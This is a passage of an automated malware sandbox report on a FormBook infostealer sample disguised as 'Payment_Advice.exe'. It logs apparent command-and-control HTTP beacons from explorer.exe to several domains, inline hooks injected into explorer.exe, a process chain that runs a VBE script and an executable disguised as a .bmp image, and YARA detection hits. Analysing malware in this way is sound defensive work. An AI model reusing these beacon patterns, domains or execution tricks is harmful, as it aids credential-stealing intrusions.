                                                                                                  Oct 6, 2023 15:47:26.904704094 CEST86INData Raw: 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a
                                                                                                  Data Ascii: rflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=reset],[type=submit]{-webkit-app
                                                                                                  Oct 6, 2023 15:47:26.904755116 CEST87INData Raw: 65 6d 65 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 30 65 31 36 32 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 70 7b 63 6f 6c 6f 72 3a 23 38 34
                                                                                                  Data Ascii: ement{background:#0e162e;text-align:center;padding:0 5px}.announcement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#848484}.container-buybox{text-align
                                                                                                  Oct 6, 2023 15:47:26.904799938 CEST88INData Raw: 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 63 6f 6c 6f 72 3a 23 39 34 39
                                                                                                  Data Ascii: r-imprint__content-text,.container-imprint__content-link{font-size:10px;color:#949494}.container-contact-us{text-align:center}.container-contact-us__content{display:inline-block}.container-contact-us__content-text,.container-contact-us__conten
                                                                                                  Oct 6, 2023 15:47:26.904849052 CEST89INData Raw: 31 44 32 36 0d 0a 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 7b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 62 6f 74 74 6f 6d 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 35 66 35 66 35 66 3b 66 6f 6e 74 2d 73 69
                                                                                                  Data Ascii: 1D26cookie-message{position:fixed;bottom:0;width:100%;background:#5f5f5f;font-size:12px;padding-top:15px;padding-bottom:15px}.container-cookie-message__content-text{color:#fff}.container-cookie-message__content-text{margin-left:15%;margin-ri
                                                                                                  Oct 6, 2023 15:47:26.904896021 CEST91INData Raw: 61 6c 2d 77 69 6e 64 6f 77 5f 5f 63 6f 6e 74 65 6e 74 2d 62 6f 64 79 20 74 61 62 6c 65 20 74 64 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 35 70 78 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 5f 5f 63 6f 6e 74 65 6e 74 2d 6e
                                                                                                  Data Ascii: al-window__content-body table td{padding-left:15px}.cookie-modal-window__content-necessary-cookies-row{background-color:#dee1e3}.disabled{display:none;z-index:-999}.btn{display:inline-block;border-style:solid;border-radius:5px;padding:15px 25p
                                                                                                  Oct 6, 2023 15:47:26.904946089 CEST92INData Raw: 23 35 61 36 32 36 38 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 2e 34 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 2e 34 73 7d 2e 73 77 69 74 63 68 5f 5f 73 6c 69 64 65 72 3a 62 65 66 6f 72 65 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f
                                                                                                  Data Ascii: #5a6268;-webkit-transition:.4s;transition:.4s}.switch__slider:before{position:absolute;content:"";height:26px;width:26px;left:4px;bottom:4px;background-color:#fff;-webkit-transition:.4s;transition:.4s}.switch__slider--round{border-radius:34px}
                                                                                                  Oct 6, 2023 15:47:26.904994011 CEST93INData Raw: 74 65 6e 74 5f 5f 68 65 61 64 65 72 7b 63 6f 6c 6f 72 3a 23 38 34 38 34 38 34 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 6d 61 72 67 69 6e 3a 30 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 6c 65 66 74 7b 62 61 63 6b 67 72
                                                                                                  Data Ascii: tent__header{color:#848484;font-size:15px;margin:0}.container-content__left{background:url("//img.sedoparking.com/templates/bg/arrows-curved.png") #0e162e no-repeat center left;background-size:94% 640px;flex-grow:2;z-index:-1;top:50px;position
                                                                                                  Oct 6, 2023 15:47:26.905041933 CEST95INData Raw: 74 5f 6a 75 73 74 61 64 73 2e 67 69 66 22 29 3b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 32 70 78 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 63 6f 6e 74 65
                                                                                                  Data Ascii: t_justads.gif");float:left;padding-top:32px}.two-tier-ads-list__list-element-content{display:inline-block}.two-tier-ads-list__list-element-header-link{font-size:37px;font-weight:bold;text-decoration:underline;color:#9fd801}.two-tier-ads-list__
                                                                                                  Oct 6, 2023 15:47:27.187711954 CEST96INData Raw: 72 6d 61 6c 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6c 6f 77 65 72 63 61 73 65 3b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 23 63 6f 6e 74 61 69 6e 65 72 2d 64 6f 6d 61 69 6e
                                                                                                  Data Ascii: rmal;text-decoration:none;text-transform:lowercase;color:#949494}#container-domain{display:block;text-align:center}#plBanner{margin:0px 0px 20px 0px;width:100%;height:140px;text-align:center}.nc-img{width:100%;height:auto;max-width:1440px}.nc-


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  4192.168.2.84971662.72.50.24480C:\Windows\explorer.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  Oct 6, 2023 15:47:46.016751051 CEST108OUTGET /hesf/?jBZ=p36eIKN5Lwa/8BGKFMSG6AYkxDDJkwu9kGEjCpPHv7kROoaFrm0HZc0Jy9RwJeFaeZw5&Gvw=T4RpitPpFtBLx HTTP/1.1
                                                                                                  Host: www.usbulletinnow.com
                                                                                                  Connection: close
                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                  Data Ascii:
                                                                                                  Oct 6, 2023 15:47:46.152431965 CEST109INHTTP/1.1 301 Moved Permanently
                                                                                                  Connection: close
                                                                                                  content-type: text/html
                                                                                                  content-length: 707
                                                                                                  date: Fri, 06 Oct 2023 13:47:46 GMT
                                                                                                  server: LiteSpeed
                                                                                                  location: https://www.usbulletinnow.com/hesf/?jBZ=p36eIKN5Lwa/8BGKFMSG6AYkxDDJkwu9kGEjCpPHv7kROoaFrm0HZc0Jy9RwJeFaeZw5&Gvw=T4RpitPpFtBLx
                                                                                                  platform: hostinger
                                                                                                  content-security-policy: upgrade-insecure-requests
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  5192.168.2.84971966.96.160.14080C:\Windows\explorer.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  Oct 6, 2023 15:48:06.495640039 CEST144OUTGET /hesf/?jBZ=bZ0cL2W3356ZdQMSZx0hbFAlBxxbFCW9aXPVjCHIIl88pIGO5acXFwKQ6PqG5/DWthgZ&Gvw=T4RpitPpFtBLx HTTP/1.1
                                                                                                  Host: www.im-newbie-journal.online
                                                                                                  Connection: close
                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                  Data Ascii:
                                                                                                  Oct 6, 2023 15:48:06.739032984 CEST145INHTTP/1.1 302 Found
                                                                                                  Date: Fri, 06 Oct 2023 13:48:06 GMT
                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                  Content-Length: 321
                                                                                                  Connection: close
                                                                                                  Server: Apache/2
                                                                                                  Location: https://www.im-newbie-journal.online/hesf/?jBZ=bZ0cL2W3356ZdQMSZx0hbFAlBxxbFCW9aXPVjCHIIl88pIGO5acXFwKQ6PqG5/DWthgZ&Gvw=T4RpitPpFtBLx
                                                                                                  Cache-Control: max-age=3600
                                                                                                  Expires: Fri, 06 Oct 2023 14:48:06 GMT
                                                                                                  Age: 0
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 69 6d 2d 6e 65 77 62 69 65 2d 6a 6f 75 72 6e 61 6c 2e 6f 6e 6c 69 6e 65 2f 68 65 73 66 2f 3f 6a 42 5a 3d 62 5a 30 63 4c 32 57 33 33 35 36 5a 64 51 4d 53 5a 78 30 68 62 46 41 6c 42 78 78 62 46 43 57 39 61 58 50 56 6a 43 48 49 49 6c 38 38 70 49 47 4f 35 61 63 58 46 77 4b 51 36 50 71 47 35 2f 44 57 74 68 67 5a 26 61 6d 70 3b 47 76 77 3d 54 34 52 70 69 74 50 70 46 74 42 4c 78 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://www.im-newbie-journal.online/hesf/?jBZ=bZ0cL2W3356ZdQMSZx0hbFAlBxxbFCW9aXPVjCHIIl88pIGO5acXFwKQ6PqG5/DWthgZ&amp;Gvw=T4RpitPpFtBLx">here</a>.</p></body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  6192.168.2.849720103.224.182.24280C:\Windows\explorer.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  Oct 6, 2023 15:48:27.268038988 CEST146OUTGET /hesf/?jBZ=C6m+T/QSDYRxkia6wo2b10sg9WxaAAR9Ewn+rwYRRUW3VljC+LgrolCw9oI9hSyVjjh+&Gvw=T4RpitPpFtBLx HTTP/1.1
                                                                                                  Host: www.tygyro.com
                                                                                                  Connection: close
                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                  Data Ascii:
                                                                                                  Oct 6, 2023 15:48:27.500077009 CEST146INHTTP/1.1 302 Found
                                                                                                  date: Fri, 06 Oct 2023 13:48:27 GMT
                                                                                                  server: Apache
                                                                                                  set-cookie: __tad=1696600107.6238826; expires=Mon, 03-Oct-2033 13:48:27 GMT; Max-Age=315360000
                                                                                                  location: http://ww38.tygyro.com/hesf/?jBZ=C6m+T/QSDYRxkia6wo2b10sg9WxaAAR9Ewn+rwYRRUW3VljC+LgrolCw9oI9hSyVjjh+&Gvw=T4RpitPpFtBLx&subid1=20231007-0048-2766-ac03-851b49f23700
                                                                                                  content-length: 2
                                                                                                  content-type: text/html; charset=UTF-8
                                                                                                  connection: close
                                                                                                  Data Raw: 0a 0a
                                                                                                  Data Ascii:


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  7192.168.2.84972175.2.115.19680C:\Windows\explorer.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  Oct 6, 2023 15:48:47.739145994 CEST147OUTGET /hesf/?jBZ=Yl+PPX/Fw39a2JSf74vYq4wd93NvWGX3Wu4/ealva/bJOpk7yrAe/vXYfNyLtgAB6gnO&Gvw=T4RpitPpFtBLx HTTP/1.1
                                                                                                  Host: www.87b52.club
                                                                                                  Connection: close
                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                  Data Ascii:
                                                                                                  Oct 6, 2023 15:48:48.156855106 CEST148INHTTP/1.1 403 Forbidden
                                                                                                  Date: Fri, 06 Oct 2023 13:48:48 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 146
                                                                                                  Connection: close
                                                                                                  Server: nginx
                                                                                                  Vary: Accept-Encoding
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                  Code Manipulations

                                                                                                  User Modules

                                                                                                  Hook Summary

                                                                                                  Function NameHook TypeActive in Processes
                                                                                                  PeekMessageAINLINEexplorer.exe
                                                                                                  PeekMessageWINLINEexplorer.exe
                                                                                                  GetMessageWINLINEexplorer.exe
                                                                                                  GetMessageAINLINEexplorer.exe

                                                                                                  Processes

                                                                                                  Process: explorer.exe, Module: user32.dll
                                                                                                  Function NameHook TypeNew Data
                                                                                                  PeekMessageAINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xE6
                                                                                                  PeekMessageWINLINE0x48 0x8B 0xB8 0x84 0x4E 0xE6
                                                                                                  GetMessageWINLINE0x48 0x8B 0xB8 0x84 0x4E 0xE6
                                                                                                  GetMessageAINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xE6

                                                                                                  Statistics

                                                                                                  CPU Usage

                                                                                                  Click to jump to process

                                                                                                  Memory Usage

                                                                                                  Click to jump to process

                                                                                                  High Level Behavior Distribution

                                                                                                  Click to dive into process behavior distribution

                                                                                                  Behavior

                                                                                                  Click to jump to process

                                                                                                  System Behavior

                                                                                                  General

                                                                                                  Target ID:0
                                                                                                  Start time:15:45:01
                                                                                                  Start date:06/10/2023
                                                                                                  Path:C:\Users\user\Desktop\Payment_Advice.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Users\user\Desktop\Payment_Advice.exe
                                                                                                  Imagebase:0x500000
                                                                                                  File size:1'131'860 bytes
                                                                                                  MD5 hash:15B3674E7FE8C5FE5284BC290A09ECB8
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:2
                                                                                                  Start time:15:45:06
                                                                                                  Start date:06/10/2023
                                                                                                  Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\pis-e.vbe"
                                                                                                  Imagebase:0xe20000
                                                                                                  File size:147'456 bytes
                                                                                                  MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:3
                                                                                                  Start time:15:45:14
                                                                                                  Start date:06/10/2023
                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c ewdbwwfpdh.bmp fjrpidauk.jpg
                                                                                                  Imagebase:0x7ff67e6d0000
                                                                                                  File size:236'544 bytes
                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:4
                                                                                                  Start time:15:45:14
                                                                                                  Start date:06/10/2023
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff6ee680000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:6
                                                                                                  Start time:15:45:14
                                                                                                  Start date:06/10/2023
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:ewdbwwfpdh.bmp fjrpidauk.jpg
                                                                                                  Imagebase:0x170000
                                                                                                  File size:947'288 bytes
                                                                                                  MD5 hash:874798CB576E238642281B10189B031C
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000003.1581336819.000000000106B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000003.1581336819.000000000106B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000003.1581336819.000000000106B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000003.1581336819.000000000106B000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000003.1581336819.000000000106B000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000003.1578728915.000000000106C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000003.1578728915.000000000106C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000003.1578728915.000000000106C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000003.1578728915.000000000106C000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000003.1578728915.000000000106C000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000003.1578835292.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000003.1578835292.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000003.1578835292.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000003.1578835292.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000003.1578835292.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000003.1578787008.000000000109A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000003.1578787008.000000000109A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000003.1578787008.000000000109A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000003.1578787008.000000000109A000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000003.1578787008.000000000109A000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000003.1579705407.00000000010E2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000003.1579705407.00000000010E2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000003.1579705407.00000000010E2000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000003.1579705407.00000000010E2000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000003.1579705407.00000000010E2000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000003.1580860266.000000000109A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000003.1580860266.000000000109A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000003.1580860266.000000000109A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000003.1580860266.000000000109A000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000003.1580860266.000000000109A000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000003.1581247037.000000000103D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000003.1581247037.000000000103D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000003.1581247037.000000000103D000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000003.1581247037.000000000103D000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000003.1581247037.000000000103D000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 13%, ReversingLabs
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:7
                                                                                                  Start time:15:45:17
                                                                                                  Start date:06/10/2023
                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c ipconfig /renew
                                                                                                  Imagebase:0xa40000
                                                                                                  File size:236'544 bytes
                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:8
                                                                                                  Start time:15:45:17
                                                                                                  Start date:06/10/2023
